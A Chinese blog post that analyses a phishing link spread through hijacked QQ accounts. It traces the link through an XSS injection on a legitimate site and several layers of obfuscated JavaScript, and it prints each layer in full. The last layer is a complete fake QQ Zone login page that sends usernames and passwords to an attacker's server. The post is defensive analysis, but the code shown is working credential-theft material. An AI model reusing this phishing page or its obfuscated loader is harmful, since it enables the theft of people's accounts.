记网友 QQ 被盗群发的套路链接

又看见一个骗子,趁机水一篇。

如题,这个套路消息是这样的: 「https://url.cn/5x4a6Hg&tLKvRPKISY 这是你?/微笑」

用移动设备进入显示是 QQ 空间登录页面,请求输入帐号密码,并盗取 QQ

这个短网址最先跳转到一个无害的正经网站(fz.fang.com)的搜索请求页,利用 XSS. 而且他用的标签名字就叫 xss. 黑人问号.jpg

骗子插入了一段 js 代码,src 为 wudi.74sq.cn/404.php (装成 404 页面?

本来用电脑 curl 之,发现这个 js 是直接跳转到腾讯网的(window.location.href = "http://www.qq.com";)

于是带上手机的 UA 再 curl, 验明:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(function () {
var new_doc = document.open("text/html", "replace");
var html = unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3Bcharset%3Dutf-8%22%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEdge%22%3E%3Cmeta%20content%3D%22always%22%20name%3D%22referrer%22%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Adocument.write%28decodeURIComponent%28arcfour%28%2236a9dc5d29d54b46793d0c682298dbab%22%2Cbase64_decode%28%22EzORpUle/yXbsLMJsHj2lt+3Y2Rns99J/Lj37LvRiWWB4Sxf075faqUVJ85nCvGPE2VhEVzCxaa3SNtNQVmxTwiW7xoDJXHJC7g4YhkBMxWFvSPf7bmJBojZsq/vyWOPe8uHMpDGYd1XJcqNY1Z4T6CwxCCK+TLfqJkC9d8KTGR+1aZqyLoLttwCLVdzceuZTddKZHuVPUGbh+0WorBVz+JdGk7lmAiZlGMd9kxuDbqvvW6LguR8teQkNAdM+KukG90+pKaGqSVYTBRTUCfJpqS3oA2sVzPHgRDRUA4uelzPC+31esGj6MXfZf7GbC4Z/WzBi6WsTrVAVvzq3oI6RoUEXa7KHj7bWi9b1BhFDxrqihtxwwpYXeWYBmMOrmgyTSiMN7hKxkKp+IGwT6s+KydpW8bT2CshYYffIHO7vu3NpWJQ/p1QLjMl0NlUZntT7TLwUWNdz5Qm95s3zaIJWwjqt+IqwhsSbvqDPwpq8jXtlGpDnNB7u0hPZg%3D%3D%22%29%29%29%29%3B%0A%3C/script%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%3C/body%3E%0A%3C/html%3E");
new_doc.write(html);
new_doc.close();
})();
var set = document.createElement('iframe');
set.src = 'https://www.baidu.com/favicon.ico';
set.style.display = 'none';
set.onload = function () {
setTimeout(function () {
set.remove();
}, 9)
}
document.title = '';
document.body.appendChild(set);
function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}

把 unescape 运行一下,得到

1
2
3
4
5
6
7
8
9
10
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer">
<script type="text/javascript">
document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("EzORpUle/yXbsLMJsHj2lt+3Y2Rns99J/Lj37LvRiWWB4Sxf075faqUVJ85nCvGPE2VhEVzCxaa3SNtNQVmxTwiW7xoDJXHJC7g4YhkBMxWFvSPf7bmJBojZsq/vyWOPe8uHMpDGYd1XJcqNY1Z4T6CwxCCK+TLfqJkC9d8KTGR+1aZqyLoLttwCLVdzceuZTddKZHuVPUGbh+0WorBVz+JdGk7lmAiZlGMd9kxuDbqvvW6LguR8teQkNAdM+KukG90+pKaGqSVYTBRTUCfJpqS3oA2sVzPHgRDRUA4uelzPC+31esGj6MXfZf7GbC4Z/WzBi6WsTrVAVvzq3oI6RoUEXa7KHj7bWi9b1BhFDxrqihtxwwpYXeWYBmMOrmgyTSiMN7hKxkKp+IGwT6s+KydpW8bT2CshYYffIHO7vu3NpWJQ/p1QLjMl0NlUZntT7TLwUWNdz5Qm95s3zaIJWwjqt+IqwhsSbvqDPwpq8jXtlGpDnNB7u0hPZg=="))));
</script>
</head>
<body>
</body>
</html>

还要套,套这么多层

1
2
3
4
5
6
7
8
<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script>
$(function(){
$.getScript('http://wudi.74sq.cn/template/login.js');
});
</script>

外面还套个 $() 倒是调用了函数…… http://wudi.74sq.cn/template/login.js, 就是它没错了。

他又套了一层…… 这个 js 在 document 里 write 了一个包含一段 js 代码的 html, 又套一层。然后终于出现真身:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<script src="//libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<script src="//open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script>
<link rel="stylesheet" href="//qzonestyle.gtimg.cn/qzone/phone/style/login.css"/>
<link rel="stylesheet" href="//wudi.74sq.cn/template/css.css"/>
<!--顶部banner-->
</head>
<script type="text/javascript">
function setCookie(name, value) {
var Days = 30;
var exp = new Date();
exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000);
document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString();
}
function getCookie(name) {
var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");

if (arr = document.cookie.match(reg))

return unescape(arr[2]);
else
return 0;
}
if (getCookie("login")){
window.location.href='https://h5.qzone.qq.com/mqzone/profile?stat=&hostuin=0#0/info/me';//二次跳转地址

}

$(function(){
mqq.ui.setTitleButtons({
left : {
title : "相册",
callback : function () {
}
},
right : {
hidden: true
}
})
});
</script>
<body style="zoom: 1;">
<script>
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 k=$(r);1 5=0;1 8=0;g("G",4(a){5=a.w[0].q});g("R",4(a){8=a.w[0].q;7(k.17()<=0&&5<8){a.D();7($("#3").J<=0){$("K").L(\'<m S="3" T="U-V:W;Y-l:#15;l:#16;d:18;1b-1c:1d;z-d:A;B-C:1g;E:F;"><p>网页由 \'+\'H.I.i.h\'+\' 提供</p><p>j浏览器M内核提供技术支持</p></m>\')}$("#3").d((8-5))}});g("N",4(a){$("#3").O("P",4(){$("#3").Q()})});1 2={e:c,b:c,n:c};1 p=o.X;2.e=p.6("Z")==0;2.b=p.6("10")==0;2.11=(p=="12")||(p.6("13")==0);7(2.e||2.b||2.n){y.s.t="u://v.i.h"}7(o.19.6(\'j/\')>0){}1a{y.s.t=\'u://v.i.h\'}1 9=x.9;1 f=x.f;r.1e("1f").14=9+f;',62,79,'|var|system|_domain_display|function|_touches_point1|indexOf|if|_touches_point2|province||mac|false|height|win|city|addEventListener|com|qq|QQ|doc|color|div|xll|navigator||pageY|document|location|href|http|qzone|touches|remote_ip_info|window|line|26px|font|size|preventDefault|overflow|hidden|touchstart|ui|ptlogin2|length|body|prepend|X5|touchend|slideUp|normal|remove|touchmove|id|style|text|align|center|platform|background|Win|Mac|x11|X11|Linux|value|bebdc2|65696c|scrollTop|0px|userAgent|else|padding|top|15px|getElementById|ip|12px'.split('|'),0,{}))
</script>
<div id="content" class="content">
<div id="error_tips">
<div id="error_tips_content">
<span id="error_icon"></span>
<span id="error_message"></span>
</div>
</div>
<div id="login" class="login">
<div id="logo" class="logo">
</div>
<div id="app_name" style="display: none">
</div>
<div id="q_login" class="q_login" style="display: none">
<div id="q_login_title">
<div id="q_login_logo">
</div>
<label id="q_login_tips"></label>
</div>
<div id="q_logon_list" class="q_logon_list">
</div>
</div>
<div id="web_login">
<form id="loginform" autocomplete="off" name="loginform" action="" method="" target="" style="margin:0">
<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"></script>
<input type="hidden" name="ip" id="ip"/>
<ul id="g_list">
<li id="g_u">
<div id="del_touch" class="del_touch">
<span id="del_u" class="del_u"></span>
</div>
<input id="u" class="inputstyle" name="hrUW3PG7mp3RLd3dJu" autocomplete="off" placeholder="QQ号码/手机/邮箱"/></li>
<li id="g_p">
<div id="del_touch_p" class="del_touch">
<span id="del_p" class="del_u"></span>
</div>
<input id="p" class="inputstyle" maxlength="16" type="password" name="LxMzAX2jog9Bpjs07jP" autocorrect="off" placeholder="请输入您的QQ密码"/></li>
</ul>
<div href="javascript:void(0);" id="go">登 录</div>
</form>
</div>
<div id="switch">
<div id="swicth_login" onclick="pt._switch()" style="display: none">
</div>
<div id="zc_feedback">
<span id="zc" onclick="window.open('http\x3A\x2F\x2Fptlogin2.qq.com\x2Fj_newreg_url')">注册新帐号</span>
<span id="forgetpwd" onclick="window.open('http://ptlogin2.qq.com/j_findpwd_url')">忘了密码?</span>
</div>
</div>
<div id="custom_bottom">
</div>
</div>
<div id="vcode">
<label id="vcode_tips"></label>
<div id="vcode_area">
<img id="vcode_img"/>
<label id="input_tips"></label>
<input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"/>
</div>
<div id="button">
</div>
</div>
</div>
<div id="new_vcode" class="new_vcode">
</div>
<div id="footerBlank">
</div>
<script>
var times = 0;
function error(msg) {
$("#error_tips").css({
display: 'block'
});
$('#error_message').html(msg);
err = true;
}
$('form input').focus(function() {
$("#error_tips").css({
display: 'none'
});
err = false;
});
$("#error_tips").on('click',
function() {
$(this).hide();
});
$("#go").on('click',
function() {
var $this = $(this);
err = false;
var p = $("#p").val();
var u = $("#u").val();
u == '' && error('您还没有输入帐号!');
if (err) return false;
p == '' && error("您还没有输入密码!");
if (err) return false;
/^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号!');
if (err) return false;
var len = p.length; (len < 6 || len > 16) && error('您输入的帐号或密码不正确,请重新输入。');
if (err) {
$("#p").val('');
return false;
}
if (!err){
$.ajax({
url:'//wudi.74sq.cn/user.php',
type:'POST',
dataType:'json',
data: $('#loginform').serialize(),
error:function(er){
setCookie("login", "yes")
window.location.href='//qzone.qq.com';
}
})
}
})
</script>
<div style="display:none;">
</div>
</body>
</html>

无聊的伪装。已登录的 Cookie 都有设置,防止用户再次点开是未登录状态而起疑心。

他使用 POST 提交,URL 为 http://wudi.74sq.cn/user.php, 数据格式: ip=&hrUW3PG7mp3RLd3dJu=用户名&LxMzAX2jog9Bpjs07jP=密码

结束。